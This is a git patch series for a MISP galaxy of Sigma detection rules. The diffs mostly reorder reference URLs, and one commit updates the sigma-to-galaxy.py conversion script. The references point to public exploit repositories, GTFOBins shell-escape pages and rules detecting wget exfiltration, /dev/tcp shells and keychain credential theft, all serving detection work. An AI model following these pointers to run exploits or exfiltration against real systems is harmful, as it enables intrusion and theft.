"tags": [ @@ -78144,9 +78144,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/lijiejie/IIS_shortname_Scanner", - "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", "https://www.exploit-db.com/exploits/19525", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", + "https://github.com/lijiejie/IIS_shortname_Scanner", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" ], "tags": [ @@ -78326,11 +78326,11 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://support.citrix.com/article/CTX267679", "https://support.citrix.com/article/CTX267027", + "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", + "https://support.citrix.com/article/CTX267679", "https://isc.sans.edu/diary/25686", "https://twitter.com/mpgn_x64/status/1216787131210829826", - "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" ], "tags": [ @@ -78440,8 +78440,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", + "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" ], @@ -78511,8 +78511,8 @@ "logsource.category": "file_event", "logsource.product": "macos", "refs": [ - "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", + "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" ], "tags": [ @@ -78570,8 +78570,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" ], "tags": [ @@ -79033,9 +79033,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://www.manpagez.com/man/8/firmwarepasswd/", - "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", + "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", + "https://www.manpagez.com/man/8/firmwarepasswd/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" ], "tags": [ @@ -79374,9 +79374,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" ], "tags": [ @@ -79489,8 +79489,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://gist.github.com/Capybara/6228955", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", + "https://gist.github.com/Capybara/6228955", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" ], "tags": [ @@ -79548,10 +79548,10 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" ], "tags": "No established tags" @@ -79570,9 +79570,9 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" ], "tags": "No established tags" @@ -79593,9 +79593,9 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" ], "tags": "No established tags" @@ -79773,8 +79773,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" ], "tags": [ @@ -79815,8 +79815,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://linux.die.net/man/1/arecord", "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", + "https://linux.die.net/man/1/arecord", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" ], "tags": [ @@ -79959,8 +79959,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", "https://linux.die.net/man/1/xclip", + "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" ], "tags": [ @@ -80008,9 +80008,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", "https://linux.die.net/man/8/insmod", "https://man7.org/linux/man-pages/man8/kmod.8.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" ], "tags": [ @@ -80069,9 +80069,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/berdav/CVE-2021-4034", "https://access.redhat.com/security/cve/CVE-2021-4034", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", + "https://github.com/berdav/CVE-2021-4034", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" ], "tags": [ @@ -80105,8 +80105,8 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://linux.die.net/man/1/import", "https://imagemagick.org/", + "https://linux.die.net/man/1/import", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" ], "tags": [ @@ -80188,9 +80188,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", "https://mn3m.info/posts/suid-vs-capabilities/", "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", + "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", "https://man7.org/linux/man-pages/man8/getcap.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" ], @@ -80275,8 +80275,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", + "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" ], "tags": [ @@ -80514,8 +80514,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://linux.die.net/man/1/wget", "https://gtfobins.github.io/gtfobins/wget/", + "https://linux.die.net/man/1/wget", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" ], "tags": [ @@ -80664,8 +80664,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" ], "tags": [ @@ -80830,8 +80830,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://linux.die.net/man/1/xwd", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", + "https://linux.die.net/man/1/xwd", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" ], "tags": [ @@ -80922,10 +80922,10 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", - "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", "https://man7.org/linux/man-pages/man1/passwd.1.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", "https://linux.die.net/man/1/chage", + "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" ], "tags": [ @@ -81050,10 +81050,10 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://linux.die.net/man/8/pam_tty_audit", - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", + "https://linux.die.net/man/8/pam_tty_audit", "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" ], "tags": [ @@ -81153,9 +81153,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" ], "tags": [ @@ -81188,9 +81188,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://book.hacktricks.xyz/shells/shells/linux", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", - "https://book.hacktricks.xyz/shells/shells/linux", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" ], "tags": [ @@ -81460,8 +81460,8 @@ "logsource.product": "linux", "refs": [ "https://digital.nhs.uk/cyber-alerts/2018/cc-2825", - "https://linux.die.net/man/8/useradd", "https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid", + "https://linux.die.net/man/8/useradd", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml" ], "tags": [ @@ -81502,8 +81502,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/Immersive-Labs-Sec/nimbuspwn", "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", + "https://github.com/Immersive-Labs-Sec/nimbuspwn", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" ], "tags": [ @@ -81617,8 +81617,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "http://pastebin.com/FtygZ1cg", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", + "http://pastebin.com/FtygZ1cg", "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", "https://artkond.com/2017/03/23/pivoting-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" @@ -81654,8 +81654,8 @@ "logsource.product": "linux", "refs": [ "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", - "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", + "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" ], "tags": [ @@ -81945,8 +81945,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", + "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml" ], "tags": [ @@ -81980,8 +81980,8 @@ "logsource.product": "linux", "refs": [ "https://twitter.com/matthieugarin/status/1183970598210412546", - "https://www.openwall.com/lists/oss-security/2019/10/14/1", "https://access.redhat.com/security/cve/cve-2019-14287", + "https://www.openwall.com/lists/oss-security/2019/10/14/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml" ], "tags": [ @@ -82212,8 +82212,8 @@ "logsource.category": "file_event", "logsource.product": "linux", "refs": [ - "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml" ], "tags": [ @@ -82246,8 +82246,8 @@ "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" ], "tags": [ @@ -82357,8 +82357,8 @@ "logsource.product": "linux", "refs": [ "https://twitter.com/matthieugarin/status/1183970598210412546", - "https://www.openwall.com/lists/oss-security/2019/10/14/1", "https://access.redhat.com/security/cve/cve-2019-14287", + "https://www.openwall.com/lists/oss-security/2019/10/14/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" ], "tags": [ @@ -82505,8 +82505,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/vimdiff/", "https://gtfobins.github.io/gtfobins/vim/", + "https://gtfobins.github.io/gtfobins/vimdiff/", "https://gtfobins.github.io/gtfobins/rvim/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml" ], @@ -82692,8 +82692,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" ], "tags": [ @@ -82803,10 +82803,10 @@ "logsource.product": "linux", "refs": [ "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://curl.se/docs/manpage.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" ], "tags": [ @@ -82847,8 +82847,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/apt-get/", "https://gtfobins.github.io/gtfobins/apt/", + "https://gtfobins.github.io/gtfobins/apt-get/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml" ], "tags": [ @@ -82872,9 +82872,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", - "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://linux.die.net/man/8/userdel", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml" ], @@ -83381,9 +83381,9 @@ "logsource.product": "linux", "refs": [ "https://linux.die.net/man/8/groupdel", + "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", - "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml" ], "tags": [ @@ -83416,8 +83416,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" ], "tags": [ @@ -83451,8 +83451,8 @@ "logsource.product": "linux", "refs": [ "https://github.com/carlospolop/PEASS-ng", - "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/diego-treitos/linux-smart-enumeration", + "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" ], "tags": [ @@ -83765,9 +83765,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.computerhope.com/unix/unohup.htm", "https://gtfobins.github.io/gtfobins/nohup/", "https://en.wikipedia.org/wiki/Nohup", + "https://www.computerhope.com/unix/unohup.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" ], "tags": "No established tags" @@ -83924,8 +83924,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.makeuseof.com/how-to-install-and-use-doas/", "https://research.splunk.com/endpoint/linux_doas_tool_execution/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" ], "tags": [ @@ -84058,8 +84058,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/techniques/T1548/001/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", + "https://attack.mitre.org/techniques/T1548/001/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" ], "tags": [ @@ -84161,8 +84161,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", + "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" ], "tags": [ @@ -84222,5 +84222,5 @@ "value": "Security Software Discovery - Linux" } ], - "version": 1 + "version": "20230112" } From 5804065e16f7deca8d75e0c2c027973bc8a3ab4c Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Thu, 12 Jan 2023 14:16:20 +0100 Subject: [PATCH 11/13] chg: [tools] sigma tools updated --- tools/sigma/config.ini | 3 ++ tools/sigma/sigma-to-galaxy.py | 55 ++++++++++++++++++++++++++++++++-- 2 files changed, 55 insertions(+), 3 deletions(-) create mode 100644 tools/sigma/config.ini diff --git a/tools/sigma/config.ini b/tools/sigma/config.ini new file mode 100644 index 0000000..8c4bab2 --- /dev/null +++ b/tools/sigma/config.ini @@ -0,0 +1,3 @@ +[MISP] +cluster_path = ../../clusters/ +mitre_attack_cluster = mitre-attack-pattern.json diff --git a/tools/sigma/sigma-to-galaxy.py b/tools/sigma/sigma-to-galaxy.py index cde7a57..ef912e6 100644 --- a/tools/sigma/sigma-to-galaxy.py +++ b/tools/sigma/sigma-to-galaxy.py @@ -3,7 +3,7 @@ Author: Jose Luis Sanchez Martinez Twitter: @Joseliyo_Jstnk date: 2022/11/18 - Modified: 2022/12/05 + Modified: 2023/01/03 GitHub: https://github.com/jstnk9/MISP Description: This script can create MISP Galaxies from Sigma Rules. It can be done setting the path where you have stored your sigma rules in the system. @@ -12,7 +12,7 @@ """ -import os, json, yaml, argparse, uuid +import os, json, yaml, argparse, uuid, configparser, time unique_uuid = '9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2' @@ -22,10 +22,56 @@ def main(args): galaxyCluster = create_cluster(uuidGalaxy=unique_uuid) valuesData = create_cluster_value(args.inputPath, args.recursive, galaxyCluster) galaxyCluster["values"].extend(valuesData) + galaxyCluster = createRelations(galaxyCluster) create_cluster_json(galaxyCluster) check_duplicates(galaxyCluster) +def createRelations(galaxyCluster): + """ + :param galaxyCluster: Content of the cluster with all the values related to the Sigma Rules + + :return galaxyCluster: Content of the cluster adding the relation between sigma rule and MITRE technique + """ + for obj in galaxyCluster["values"]: + for attack in obj["meta"]["tags"]: + if attack.startswith("attack.t"): + with open( + config["MISP"]["cluster_path"] + + config["MISP"]["mitre_attack_cluster"], + "r", + ) as mitreCluster: + data = json.load(mitreCluster) + for technique in data["values"]: + if ( + technique["meta"]["external_id"] + == attack.split(".", 1)[1].upper() + ): + if obj.get("related"): + obj["related"].append( + { + "dest-uuid": "%s" % (technique["uuid"]), + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to", + } + ) + else: + obj["related"] = [] + obj["related"].append( + { + "dest-uuid": "%s" % (technique["uuid"]), + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to", + } + ) + + return galaxyCluster + + def check_duplicates(galaxy): """ :param galaxy: Content of the cluster with all the values @@ -81,6 +127,7 @@ def create_cluster(uuidGalaxy=unique_uuid): :return cluster: Dict with the basic information needed for the JSON file. """ + version = time.strftime("%Y%m%d") cluster = { "authors": ["@Joseliyo_Jstnk"], "category": "rules", @@ -90,7 +137,7 @@ def create_cluster(uuidGalaxy=unique_uuid): "type": "sigma-rules", "uuid": uuidGalaxy, "values": [], - "version": 1, + "version": version } return cluster @@ -197,6 +244,8 @@ def create_galaxy_json(): if __name__ == '__main__': + config = configparser.ConfigParser() + config.read("config.ini") parser = argparse.ArgumentParser( description="This script can convert your sigma rules in MISP galaxies, generating both files needed for cluster and galaxies. If you need more information about how to import it, please, go to https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma" ) From 323f9f47a11dadb95cb072b7fdb06f40d3ab0252 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Thu, 12 Jan 2023 16:45:21 +0100 Subject: [PATCH 12/13] chg: [sigma] version must be an integer --- clusters/sigma-rules.json | 2192 +++++++++++++++++++------------------ 1 file changed, 1108 insertions(+), 1084 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index 504a13a..f7a6bd3 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json @@ -174,9 +174,9 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], "tags": "No established tags" @@ -197,8 +197,8 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", + "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" ], "tags": [ @@ -232,10 +232,10 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - 